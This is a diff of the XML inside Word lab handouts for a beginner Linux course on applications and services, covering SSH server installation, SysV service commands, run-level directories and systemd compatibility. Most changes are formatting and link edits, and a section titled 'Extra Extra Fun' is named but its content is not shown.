-        <w:t xml:space="preserve">Once you have enabled, then started the new service you made, you can see if the service is running with with </w:t>
+        <w:t xml:space="preserve">Once you have enabled, then started the new service you made, you can see if the service is running with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>with</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2258,7 +3269,15 @@
         <w:t xml:space="preserve"> make a real back door</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> in Extra Extra Fun</w:t>
+        <w:t xml:space="preserve"> in Extra </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Extra</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Fun</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
@@ -2269,7 +3288,15 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>Extra Extra Fun</w:t>
+        <w:t xml:space="preserve">Extra </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Extra</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Fun</w:t>
       </w:r>
     </w:p>
     <w:p>

--- a/3.Linux/05.Apps and Services/Linux Lab 5 Apps and Services.docx
+++ b/3.Linux/05.Apps and Services/Linux Lab 5 Apps and Services.docx
@@ -32,46 +32,13 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> Module 1 Linux, Session 5, Applications and Services.  These slides cover the current method of controlling services, systemd (</w:t>
-      </w:r>
-      <w:hyperlink r:id="rId6" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>https://tutorials.cyberaces.org/tutorials/view/1-1-5.html</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve">) </w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t xml:space="preserve">Direct link to the video:  </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId7" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>https://youtu.be/x9oLHTKH36I</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t xml:space="preserve">Direct link to the slides:  </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId8" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt1d2f7b61847e2cf1/625458a97e7b344b2534e435/CyberAces_Module1-Linux_5_AppsAndServices.pdf</w:t>
-        </w:r>
-      </w:hyperlink>
+        <w:t xml:space="preserve"> Module 1 Linux, Session 5, Applications and Services.  These slides cover the current method of controlling services, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>systemd</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -325,47 +292,44 @@
         <w:t>will</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> use</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> SSH server</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> in later labs, so we’ll install it for practice</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.  SSH requires t</w:t>
+      </w:r>
+      <w:r>
+        <w:t>w</w:t>
+      </w:r>
+      <w:r>
+        <w:t>o parts to work</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> the SSH server listens for incoming connections and the SSH client</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (or agent)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is used to connect to a server.  The SSH client is installed on our Ubuntu desktop, but the server is not.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>use</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> SSH server</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> in later labs, so we’ll install it for practice</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.  SSH requires t</w:t>
-      </w:r>
-      <w:r>
-        <w:t>w</w:t>
-      </w:r>
-      <w:r>
-        <w:t>o parts to work</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> the SSH server listens for incoming connections and the SSH client</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (or agent)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> is used to connect to a server.  The SSH client is installed on our Ubuntu desktop, but the server is not.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
         <w:t xml:space="preserve">If you were to Google “install ssh server on ubuntu desktop” you would find that the common SSH installation is called </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -427,7 +391,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9"/>
+                    <a:blip r:embed="rId6"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -556,6 +520,1023 @@
             <wp:extent cx="5220269" cy="1916302"/>
             <wp:effectExtent l="0" t="0" r="0" b="8255"/>
             <wp:docPr id="2" name="Picture 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5330637" cy="1956817"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:t>&lt;snip&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>You will see later that the output is the same as what you get with the systemd commands.  The SysV commands have been intercepted and passed to systemd.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Practice using the SysV </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>service</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> command </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">to stop, start, and restart the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sshd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> service.  Each time you change the service, use</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>service ssh status</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:t>to check that the previous command worked as you think it should.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve">When you are done, make sure the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>sshd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> service is stopped.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">If you run </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>ls /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:t>or</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ls /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>rc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>*</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -d </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">to see just directories that start with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>rc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> on your Ubuntu VM, you should be able to find the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>rc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>directories</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> that provide SysV compatibility.  </w:t>
+      </w:r>
+      <w:r>
+        <w:t>The standard run level that</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> provides GUI support</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is 5,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> so let’s look at </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>rc5.d</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> with </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>ls -l /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/rc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>.d</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="655C60ED" wp14:editId="69A7EC1F">
+            <wp:extent cx="4742597" cy="724653"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+            <wp:docPr id="6" name="Picture 6"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4844396" cy="740208"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>&lt;snip&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The symbolic links</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>symlinks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> in /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/rc</w:t>
+      </w:r>
+      <w:r>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.d point to files in the /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>init</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> directories.  Look at the contents of those directories as well.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  If you look at the contents of one of the files in the /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>init.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>directory</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, you will see it contains a shell script.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  Remember, in SysV the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> program looks at the files in the proper run level directory and then executes the files the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>symlinks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> point to.  It uses </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>symlinks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> to avoid duplicate copies of a file that is executed by multiple run levels</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E03D7A6" wp14:editId="47832150">
+            <wp:extent cx="4261110" cy="2348837"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
+            <wp:docPr id="5" name="Picture 5"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4290149" cy="2364844"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>&lt;snip&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Note:  In other distros like CentOS, there is no </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> directory, since </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is the name of the command used to change </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>run level</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">s.  Also, the files are kept in (say for </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>run level</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 5) </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_Hlk17375398"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>rc.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/rc5.d</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>.  There is a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/rc5.d, but it is just a symlink that points to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>rc.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/rc5.d.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">To ease the burden of keeping track of the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>symlinks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> in the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>rc.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> directories</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">SysV uses a utility </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">called </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>chkconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, but it is not always part of the default installation.  The systemd utilities do not support the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>chkconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> command, so we won’t be able to use it here.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  In addition to maintaining the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>rc.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> directories</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>chkconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --list</w:t>
+      </w:r>
+      <w:r>
